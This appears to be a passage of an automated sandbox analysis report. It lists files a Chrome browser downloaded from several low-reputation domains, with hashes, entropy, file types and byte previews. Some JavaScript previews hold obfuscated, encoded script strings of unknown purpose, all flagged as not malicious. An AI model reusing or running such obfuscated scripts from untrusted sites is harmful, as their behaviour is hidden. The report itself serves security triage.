                                                                                                                                                          SSDEEP:3072:VD6KReWP4vtuGy4eSm0zapcJJUfyXx3O4/wLyrXk66RC0s:VD6KMKUuAFmwapcJJUfyXxeerXk6QC0s
                                                                                                                                                          MD5:CA7749BA7912EB65B729E869BB83ACD9
                                                                                                                                                          SHA1:4CE57A051731944EAD05072DCE1F47EAE7787170
                                                                                                                                                          SHA-256:DB3F625270BDB9B6EC85570C242CB9FE63D0ECBEBF003F5E043A5AFADD03BC96
                                                                                                                                                          SHA-512:05DB56552FFBF63C9D8D7061BFB13A7FD7A937BBC52BBA33C19DACBD47DB95A958B482FF47B696712F3915D49E7A4BFF4679E1508ED0ACB8A019E20D9413E8E4
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/240516-03/static/js/vendor.js
                                                                                                                                                          Preview:a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtAjLgTgDYBdAGgG8AiAagCYakqAuAMwFc0YAXAS3UzcyIMmgCU1dkhAACJNwBOvHlQDcANygKZCgLxpMVACJIArAAUqYsr32GALAQCOALyuYAhAAYxqhZgUAOnMyKgBlRV40AHMqSihuNk4efgNuCQUQbnYFNBleQQALXiQydIBfcrFy0JoAYQBZAhYOLj4BIRFxSWk5SJUNLR07YzNLa1sDKhRuUyYxT1xrFF1sEkCogBMQAA8AeVYyKF0PDxQAMnPcAHo8da3dg8xcMgBaHwAeLz8A4JoggBiACpMFAAD5gjxTABy0IUbgWKDE1ioAEEFAooABPOIUB77VhJNqpQQZLI5PJQAD8KECUAgEAANliiiUjgpouwALYgNDcJBiCFeZgFbjFUpCLScnl8pB3apVGq0ACiAGZmkSUh1hKIJNxArsICgFPyTlMwgAOOiM9ytLUGMnZXIyADsHl0ezAACsQDxAttWFEQOYFCgICATSyKEqoLjollNe0HRRMk68i7KmI6Yrag1uDQWskk4Idd0qFJZPIlANNNo9FMTBYrDYRi7ogANLzNlZTPYuACSTmbxymLr2uHmZCQIwwhQAElYfkFzP9AgAlUIhlBckogXGBtBQRnMxMk9IUWsyEC6KCs0q8YKhnfSCG0rfPkDWNC6Kh2pNUXRdG4LFwxQVgZG4PxyWdMUSkCMVeUwNAqT/ElulTCk5EwERuEwZF4MKRDUIER1MLQRVmCEZDiIMdDoLyJBsLKPCswQgwaLwigxVDYAZHI6pKIVapagALQaBBC2JbUugkS960MRk9jQCTfH1Q1jVNDjOl1PFWACUkyHUFBeE2GQvEA3RPwwmDVCQYBeG4GBCiQiQYCgXpcGYay8g4ui0wgwI3OPJjxHKVQ3N6OgvPomRfLIBRSJgwKj0ZEL4uqcL3NkVVov8uKFBsRK8n1ILUq6eLCsqbzYqLEkioC+k
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 231x135, components 3
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):17878
                                                                                                                                                          Entropy (8bit):7.959716583208729
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:384:OBLtpneFRErL/izHYU4KNT+GbKJrnl0YMMlTY3X4K6gwI:YtpnCErkN4K8GbKJrnl4Y/gL
                                                                                                                                                          MD5:3421B805EE092419843BD0B3CF2F3AD5
                                                                                                                                                          SHA1:FCDCA9406D3B0A7DE619225D006968F16F401528
                                                                                                                                                          SHA-256:2E72A4B6BB750E21045AA7BA60ABFBD2EA5FB721579ABD2F75875008FD815BD4
                                                                                                                                                          SHA-512:1A8AD295C8B019AE032F5CF1F3A188C189F8B128F6459174D3817147338E3AAD4BE739E869D796161D5F0390820D96916E16FEF371FD9F33C5282B92F67D5599
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:......Exif..II*.................Ducky.......P......http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:29498082-5ddd-3c4d-86ad-a7cbd10a716b" xmpMM:DocumentID="xmp.did:BF908D208D5811E78563D2E50C3F5203" xmpMM:InstanceID="xmp.iid:BF908D1F8D5811E78563D2E50C3F5203" xmp:CreatorTool="Adobe Photoshop CC 2017 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:82b9be3e-f922-d048-8196-e2c819558962" stRef:documentID="adobe:docid:photoshop:eddc2de5-6163-11e7-92d7-efec1b3bcc87"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d...............................
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 90 x 60, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):9724
                                                                                                                                                          Entropy (8bit):7.94922717692573
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:4DcHdjuJjt2quYOxo0ig39cbZnvWlCSm4boyxyEd0JtQ:4IH5OTd0FEt2O4xMEd0fQ
                                                                                                                                                          MD5:547D905161AF5A0A44103945A9129365
                                                                                                                                                          SHA1:45271CB0CA2AA65B9C093A211E7780E93A6AC486
                                                                                                                                                          SHA-256:92CD25BD01B6343F047910A09251D97D6A3B3857D9A9EC1708A684EADEC68B68
                                                                                                                                                          SHA-512:2F09BAB8B7DC6B5226D7140BAE67362456A21AB491AFC0C8C3663BCE7A071059EE4526E2DD6D4D61B81D8B36CE40972611A72C49A9765CE0C51BB7135EB44440
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/image-pc/nav/icon-b/card_dt.png
                                                                                                                                                          Preview:.PNG........IHDR...Z...<........E....tEXtSoftware.Adobe ImageReadyq.e<...viTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 6.0-c002 79.164352, 2020/01/30-15:50:38 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:dc7bb777-32f7-c247-8a71-326368638fe8" xmpMM:DocumentID="xmp.did:B430413A89F211EAAA5FD7B924C993FF" xmpMM:InstanceID="xmp.iid:B430413989F211EAAA5FD7B924C993FF" xmp:CreatorTool="Adobe Photoshop CC 2019 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:44a76a31-a741-df47-be85-17dd3e48eedf" stRef:documentID="xmp.did:dc7bb777-32f7-c247-8a71-326368638fe8"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>.|.;..".IDATx..|...U..[.s....#C..X.d
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 139 x 139, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):40666
                                                                                                                                                          Entropy (8bit):7.987750118508729
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:768:PDU/gfjniW2cSCooVeJ+/LhQ1+MZVMogOSwGzY6IrK5Rh51hydW8Gdjlcxo3W0Yd:Pg/yjniWxSCtqki1+MTMLOSXMyRh5uke
                                                                                                                                                          MD5:C648210E3B58752CDFE5D4EB32B46720
                                                                                                                                                          SHA1:D3903EE71C71CF27BEF46F34B0D23AA827F7F020
                                                                                                                                                          SHA-256:4CA3A487065C2D3B8057EC8CF32836FA6C0620F3E63B59A505FB7BAEE0300EAB
                                                                                                                                                          SHA-512:7A102CBE4681F9096130585C8E5E079DA17CD05A21A2B9BC7754CB36C7AFDD2A8FD52327440CA2A550B32F14C5A5E1ACB01E8ED0C7F15BE9FE3301D728557A3A
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:.PNG........IHDR.............Q.j.....gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....bKGD.......C......IDATx..w.]Wu...e....E.Q/.,7.6r..c:..%..J.{.|.7.......:....c.6.U..,..^O?g.]W.s~..}.d.....>.........1......._<$ Q..q./...L.rw......7......s....7..>..W........_9,.b@+....M.<..@9.K..Sw.....G........ZX..k.l.%S....H..u...._X.../,....(S...W...@...C.......?f...../..l......8a..|q7N...........p?.C.Ou../.._}..G.g..ILH..O............5......^...B...._ ..f.....qj.....xC.i.Ev....W...,VX.9..DN p...*.......}. .]-...{......>c.y.H,..ly...J-.....8..G4.....v~.....!.....H......d..d...Z...........?^X:OK,<...K..hRR........H3...U.u...}..gI........y..p .3.Q..%&...CX.. .&u....*.. 3.:).d.....Q.....M.@....).Bf....:p.!.9C..%............A.|...Zk....^.I...........Ab.7....74?...&.......-!..nh.......z....C.";...C..3TXr@..a..5....Q.R&..@.q.U..%.....K.k^....@KH....u.yG..w.Z.......u.....^/.>0.`+.....0I.s.r~M.9qN.h....p.;..Y.`....G/z....Z........l....b.S.,....m..(...Mo........2..
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (1860), with no line terminators
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):1860
                                                                                                                                                          Entropy (8bit):5.845944771947073
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:24:VHQC6JX8y7EBsWWg0fflUGOW69XM3X89UBGPhZC75wCP3g2xHuf6bsWalp:Vw517EBpWgWfKzt1+BAhZC75wXSbsdlp
                                                                                                                                                          MD5:DFD335562D8D028292B8569586AB6902
                                                                                                                                                          SHA1:68EDA38D42D0F4BC5C60AF2C58CC33CD17280B6C
                                                                                                                                                          SHA-256:E95BAB46761928950BD59EBD8FE1C6A3D1FFDE89D2A6D79C730D0C74C5785646
                                                                                                                                                          SHA-512:47C2F125E8C97CE93DE0192641732D38B635B0F36FF2DDFF864DCCF2682FF5DAB27ECF1F7C9944DBA3736C45780A170D6B84ADAFE5953E82CEDB1DDE54BE5BB9
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb1-hw.qectyoua.com/pc/240516-03/static/js/components/wrapper.js
                                                                                                                                                          Preview:a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtATAdgE4BdAGgG8ARSgJQEUAuAMwFc0YAXAS3UzVJCkOASnIAiFkhAACJBwBOXTmIDcAeTAArEJwB0AExBMuaEAAV5KCCHkcAnpkFiA+s5BIAsin0sANiDEKADcoXxYQBgBCAAYAX2EVEPlpLgBeDkwxSn0ADmAxYVJ5dN00TC5ClnTM6JgIJgLSX2qxADkATQAPNUaUVMx5TGFMcljSDW1OTF9dAFsoCABxEA4OGyRh7DEuJABlGyClEEoQNC4QfTFiYULyGBRZiHRTjiQGcjB0SWY2Th4y0TyFYseRoaQcXQgTAARgAzPhcMJdBwABanTAQsAmfR8Py+UhieQAc0IdgKwjGvigdhsP3Y3F4gOBoPBkJhsIALABWJGo9GY7G43z4sQAYQAjgA2ACi5LGsyQRIAQihOnS/ozyECOCCwRCoTlOby0WUBWgcWg8QSOQBqShkm5jUI2DgqtWsen/IZa5l6tkc2Gw4383RY81CkXQ+QAVQA0nLSPc0EF1v83eqGQCfTqWfrMIacsHTaHBZbhQTOgBJaG+BNQNChOxIHYZr1MnN+qFcuFFjEl8NlkVK1qUDkJjgoKByVua7W61kG+G9s0Wq1iACC0eilAThjOFxnWbnubZcKIy/7q/LYjMvkINATvi4KZy0Wih+9x877Ml+AvYavEVxX0aVFkfZ8QFfWo3g9DUj19Bd2QDf9SzXAANXAADUoATVA2H0D923nPM4UlHlkRNPsAIjAlxVaVpOgTCBFAALxAAB1NEQF8Qjs2I09YS5QsKJDajBwJKBRQAejHR1SFMUUFg4GAUSgXiv0Qs8gxE4sxLXIkmDMXYmJRZ4lWxEwiTMKwWAgdSEJI2FJWiFCBzXOgwENR8UCJEwlTsLwsX8eyO00zk/x0qjUOvFiABU6AALVwp5bCVFYQv4qEz3IvldOikVcBoBLazkrhHhQWwzCnJBgAqgjYMzT8
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (56340), with no line terminators
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):56340
                                                                                                                                                          Entropy (8bit):5.9662213858148565
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:1536:KCyiv8cd6UgycySsRgMeNCjSmcxUA1RcG5FZ4HNSQ:KCyO0gcySjNT9JyH5
                                                                                                                                                          MD5:8937AB56309350F7B26169CB4FA0527B
                                                                                                                                                          SHA1:DC0A9EFD328DB270C14506556EDD9B90DCDC4EE9
                                                                                                                                                          SHA-256:3710F7FA29BE1F3AB61867EBECD8C9A031F3DE51A78DC4651826D4B57974F413
                                                                                                                                                          SHA-512:745FDEC172D8ED0199404020FB2D3539A390653A929DD6AFB33E20519204D675AE5B5D8D881FDFD3B4055051E03BA17A9656E4B102F2169F9EB392218E845235
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/240516-03/static/js/t4091.js
                                                                                                                                                          Preview:a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtAjAJgFYBmAXQBoBvAIgGoAOW46gLgDMBXNGAFwEt0mHuRDk0ASkoA3KACcABHwDcfALydu/QZOockIeUh6y+vakpkLhIVZTRQAtiBbUAXgAsA+gGEActXInJCQoAHMQJBZKKDYeEFl2Ll4BNCERSVkQHg5ZNGp5Oh5aakBR/UBvDMAKdToQbAAGUmLAaTlAOBVqAF9yKAAbCHcoTwATKCR3RM0UoQysnLyC2iLqQF+AwHxNQFBlQGoVQHVtQFnrQAdTTc3AMm9AGH/VwBujQBYPQAyjQHflQEAGQGg5QCQlQH6/ds6evs80Dgcx5MEPCm2Vy8gW8kAV8qLDY7fZHAB0726vX6SGgMAi/y0qSBlEyINmhWKkOhW22R1OZ0AXl6AHgtER1kX0sRNcfiZvkifkoTDyYd6eQwCA2ChMszAek8dNchz5sTylVaDV6sTGoBZJX5gp4oBAaDFOIlbOlc3B8uqdQaMpquAtjUAL6n8mDoNh8WROAZ6tIgYHs43EwCwcotADEqZuV1EAnMqAWUT+UM4p5NdrdRoAfqvZKCTKFqbFebisHs9amvb3jGQJ5ha6oDwPdZvUbOfKFUqLTTAPD6gFo5aMgGB8BzdasSqQoPgDeS1VTjkAAMknmBs2FI4gscnkaFUTaUhrQ8kHw9H49UaGnmFX1AAVNRxOQM3KyoB6M32gBC3QAwAYAUORWgF35QCarnRMGfqPu0AAfmoVgJGJQBZeUAeB1dmjPhQj4HhIiTbFPVrQlZXycp702Y4X0APp9ADsPQAGJTmJtil2Ysex1JAUiQpIUJrNMfXrO9SJzfJAHmFQACXxIs0C04rj+RAXs+C6as0OvTC70ASHNAAlTB9ADqEwBG7yEgAPKtkJZCTfSk285IfQBw00AN7l+R7MJnE0wFtM5eQsMAP7VAHEnUzE3orSmLrDDbLvQAAOUAKjk5MAHgVTIgcT3PQk
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:gzip compressed data, from Unix, original size modulo 2^32 2909
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):911
                                                                                                                                                          Entropy (8bit):7.814395167373869
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:24:Xff+yozp6y5X85idtYXrsLVh4YyrickQNuQjI0vf4W2:X3+7zQSXgyB4YyjkQNnjtvf4W2
                                                                                                                                                          MD5:287B6B8F1EF0D064F10FB8C6063DE18E
                                                                                                                                                          SHA1:C0671E7287F3390346C2250474CCDC0A11015DB5
                                                                                                                                                          SHA-256:7C6A09F79F2F68528F3ADAC1C437567AE93B76983A0BE73CFDBD2C5BD45A0731
                                                                                                                                                          SHA-512:77BE681AA9207D2E28E4A664E755D0F63577F635F73405E72926C860A0CCE6D862CE9CFC7AE58CDD854ED29C46B9CCADAD28FE9AB5FE577151E9660BDD51318C
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://2hsuoj.eveday.me/ftl/commonPage/themes/hb/css/pc.css
                                                                                                                                                          Preview:...........U..8.~..).6.+.@...t..j..V..8.Z.F.l.F..w0.q6.?^..*f..f.... .B.&hu.\...<(w..b...7/...bR.....E.%......jWH>.j..6F+..T$kR.L....L#.26..N.....%'...\f...1Qn...>,.<.f.h......Q...HHA..d.E%7".QU.d...Q..*..qSt.\.Y.HM..v|...M.......^./.z.M'.....t3v<....g....I.$.T..2K....AU....I.x....2..........%%...,.mV.Q..g}:.........2]..t.G.Y.7.=o.9.........B.j......M..7.o.....W.bt)1.....8......EW6}....I......D3.,..2;..x..o..(A.2.Z(...^....Ty...`E.........(..A.5=.G..`eo.V#..96..$..I.E.5y#..K........r..=].ho/.79..X1...is>.'/)Q....vRl.lN.........O.~........$......v....V..>.....CC...r..d.....!........%.....[...-.....7.(y......o.'....tp.<....g.......~~.8.v..o. ]...!}$|..l...^&.%Q.dN.W........._..6....{..s.....+K..:%|.q.?.4SW.X....2..(..||....[]*...T....\.3.6.0J..!../.<...9.......c.G..Ed..`.{w.ig..q8Ac.....dL.o....s..y...|w9.jY....`.RV...<o........{B...n..]...
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 231x135, components 3
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):15721
                                                                                                                                                          Entropy (8bit):7.951906564348781
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:384:dKczy4UH/wjIDwYeQYJsBxAHUED+jPNaB7PeeNsGiOhj:oWybH/wjIXJKCgp2N67aVOt
                                                                                                                                                          MD5:CF546C6FD6FFD1448867E707453F53F8
                                                                                                                                                          SHA1:C00AF79E1A3B5BA95D05DC83807403BF12E3BA17
                                                                                                                                                          SHA-256:D2B002C3665CAFB298339F3DADCAAC9595EDC7565F79BFB5602369300ED59426
                                                                                                                                                          SHA-512:298F6272660EF8D487EF7C1106DC0C95392D6F7DB891E4694C6024E8778DC95DD182B00A89AB7FF4E6C72D4AC0038D37AA4049D6C87DE0F5D7C5A7CB2BE8F4D1
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/image-pc/video/mg_h.jpg
                                                                                                                                                          Preview:......Exif..II*.................Ducky.......P......http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:29498082-5ddd-3c4d-86ad-a7cbd10a716b" xmpMM:DocumentID="xmp.did:BF908D288D5811E78563D2E50C3F5203" xmpMM:InstanceID="xmp.iid:BF908D278D5811E78563D2E50C3F5203" xmp:CreatorTool="Adobe Photoshop CC 2017 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:82b9be3e-f922-d048-8196-e2c819558962" stRef:documentID="adobe:docid:photoshop:eddc2de5-6163-11e7-92d7-efec1b3bcc87"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d...............................
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 1 x 1, 1-bit colormap, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):98
                                                                                                                                                          Entropy (8bit):4.580480016229387
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3:yionv//thPlE+kSI+DthC9/kITQoWlED//jp:6v/lhPfkCDtETT9WlEDTp
                                                                                                                                                          MD5:73DF4484683667DA60643329AF7DBDD9
                                                                                                                                                          SHA1:9AE16E29D964C6A1ADE80D1A98FDAC225C8DC291
                                                                                                                                                          SHA-256:D5C956BFFB7565A9DF0E1B3C80AFBA091A617944474243FE8C90D606D75090EC
                                                                                                                                                          SHA-512:29C8C67E0412D06164C72BF9B15B0C24FA5EC1015F11EC57653AA7B28561FC5FCE7384302A8C7978D1C9E3AA88939AF3C64FC68AF38844AC4DC3E72D7E6C76C1
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb1-hw.qectyoua.com/cc.png?r=9636637722
                                                                                                                                                          Preview:.PNG........IHDR.............%.V.....gAMA......a.....PLTE...........IDAT..c`.......!.3....IEND.B`.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 30 x 30, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):2026
                                                                                                                                                          Entropy (8bit):6.550833124518682
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:48:w/6NVd6V4knA9WIb102t0/3LwXj3E3HSy30ZYHlxtvjyznpqWRN:wSJlknmWIbD63sg3HSoHlPvunH
                                                                                                                                                          MD5:5E50D4E76B0014CC5521DAE3EEE4CDB8
                                                                                                                                                          SHA1:8EBE887A860F0CC896078FE1AC5CCBFC1057A529
                                                                                                                                                          SHA-256:3DC953ADC1D90DE566B011CCE2A3DE7B1EFBFD5F9F93E82C3CEDEF0E5C91F6DD
                                                                                                                                                          SHA-512:058176ADFF4BE9FD7BD05825546BC0C43B3F322D343288165D912365AC3F3C10E347AA6EF682F46C5C3B7E951CD336BE7168F008E5147E78A168C4B89A39A8C4
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/image-pc/nav/icon-s/live_evo-i_w.png
                                                                                                                                                          Preview:.PNG........IHDR.............;0......pHYs.................iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 7.1-c000 79.b0f8be9, 2021/12/08-19:11:22 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#" xmp:CreatorTool="Adobe Photoshop 23.2 (Windows)" xmp:CreateDate="2022-08-12T11:41:49+08:00" xmp:ModifyDate="2022-08-12T11:47:34+08:00" xmp:MetadataDate="2022-08-12T11:47:34+08:00" dc:format="image/png" photoshop:ColorMode="3" xmpMM:InstanceID="xmp.iid:9c358eab-39e0-a54c-99ae-0692b5390b5a" xmpMM:DocumentID="adobe:docid:photoshop:b387ea0c-2c61-f045-9e1c-ef5c35f3f642" xmpMM:OriginalDocumentID="xmp.did:0ac9fd
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:GIF image data, version 89a, 333 x 81
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):6952
                                                                                                                                                          Entropy (8bit):7.8296657204466555
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:dCOpXCdu+V379E2PLtXpxppAThmOSlRkgK:dCOpyduQ7hLtXpwhmL+
                                                                                                                                                          MD5:A9B347B185097D5B34AB032ACBB24035
                                                                                                                                                          SHA1:7879231280DE98EB9ACB115B467905912D7A3377
                                                                                                                                                          SHA-256:19354B184D1B5F997B9C49A142313B8DE016591053AD1170201CFDFFE3013F1A
                                                                                                                                                          SHA-512:B4CDCFF58BE22E3CBA3D910D167E5F7113F9CF5D603D9B30FC3258233B4B73A6B8EEC8FD8BFBE430B0DA6C396D830195664814ED2C0AD1A1D0FC06CE45D7E176
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:GIF89aM.Q.....wI..:99..GC7.k.!!!..e85+AAAXTG655%&%111***tjI.{S..j..ieY..X......zDDDIIIMMM.....-..|....f....vjbGzsY.|e..J....W........RRQ.q>}vcgY8TM7.....wrlV`ZD..g.h...<9/.jG..\R9..E.kk.d...uc;....3.???.......W..wFFF..rmkf<<<@=1.....88..\.f....p.m@..[.}..W~rL....j..YLJA.....u.....T..P+)&.zE....1/)b^Q..LD....D.u-,)....][Q..Q....(......QG0JA-542SOC..V.....871...><6....].3....IF>%$#.3V(&#..P..b43/NMI,+'.Q6 ..kA?9DC?((%GGD###///;;;434(((#"#..............l........D....D..l.lDDl...D..llDDl.m...DD..l..DD........lDD.k....l.n..ll..DllD..... lDl . .... ..l.........l.........#$#$#$.. 777000..l....l..333444...$$$+++...'''Dl. ..l..===...>=>...0//..`...21,....;<;<;<.....R..G.kV.gDllIHC.....t..V.....888,,,986..._^XEEE..lll.......YVO ...!.......,....M.Q.....3..H......*\....#J.H....3j.... C..I....(S.\...0c.I.&.6s.....@....s..H.*]....1I.J...X.j...V.`.F.$V#.h.B%H..%I..1`p....8p..A4i....@II.nB.$......5H....3k.,.r...0`P,..6J..,[. Z_f.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 30 x 30, 8-bit colormap, non-interlaced
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):1203
                                                                                                                                                          Entropy (8bit):7.6423370091541045
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:24:0q2UxzC7yqsfRY5+zg95emDCzEvk8tHqZRbfZoJ2HPt5gTT4tBOhAMe6:0qboyqsfO5+8MA+EvDpqzfXH7g64eN6
                                                                                                                                                          MD5:375073F4229C808F4EC35542748EBA24
                                                                                                                                                          SHA1:A3442405D67BDBEBA808F0433C0F46CCA4C2E1D6
                                                                                                                                                          SHA-256:9CBBBF9B8DF0CA98E9E236C87E9D456B6B1444E85D0E90DAA060164374ECBAE3
                                                                                                                                                          SHA-512:1D978648E31DEC62E03FEE6EA377AD16288CE6B1A5E2D3828D44A920C6028733E8428B7FC8E1A5BD93584F563763B0AD7B43E8A3540091A7F91DEB55097E2AA4
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:.PNG........IHDR...............^.....PLTE....!B."C. A.$E."C."C.#D.$D."C.!B.$F."C."D.!C.#D."C.#D.$E."C.%F.#D.!C."C.!B.#D.!B.#C."C.$E.#C.!B.$E.#D."C.!B."C. A.!B.&G.$E./N.%F.!B./N.-L."C.!B.!B.#D.%F.$E.'H.3S$8V.)J.)J.0P.*J.'G...y..Os.M^vHXq*B_.?\+=Z.8Z.;X":X.7X.6W.7V.4R.$R.2Q 2P./N..N.,L.(H...W........e..u..e..Dw.P}.6u.[x.b..az.^|./l.7p.Dn.=r.^v.1e.9j.;o.Gc.Sn.'a.1a}Mc{"Ty*Yx5Yu<ZtAVp2Rp7Pj$If"Cc.Fb*@]&<Z.4S.(O./N.%F......................u..N.....`..|..{..I..g..^..?..r..i..q.....B{.m..F..m..Q|.l..Z..J..<w.7n.t..i|.Lk.)h.Lq.Mq.Bo.@f.+f.Xn.Oj.@`.?a~Ud{1Wz/Wr%Qq>To,So-Sm=Oj$Hd1Gb&Da.Ba.Ba$@]..W..T...0tRNS.........R.....7.z.........~tqk_XMEA?3+.....W++..R.....IDAT(....@.Eg.......Hf;13-333.......".S.V..=....Vu_..I..FT..f1L...3"i.V..Y..%.-....iI...qS$..V.;P.!G..X.M+.S.v'.).(M.-L....&q..=K....}...M-L. ..C:.R$.v...<......yh..H..P.........{.X.YHL...............O..MU.9.kg!$....$J....+.3mu...+u6?....1.Y... 2.t......m..s$.[...n.)@!!..LV...........4...dX... ../v....^......o..
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 30 x 30, 8-bit colormap, non-interlaced
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):1528
                                                                                                                                                          Entropy (8bit):7.81371567773462
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:24:6Jn6h/+4UkSCEhCV79H09qlb/F7JbTDpA7gZSDVQavTGcANjSoq8OFxkzGNuEL:3/7UkChCrHEQF7lT9AEZkVQayLBbq8OT
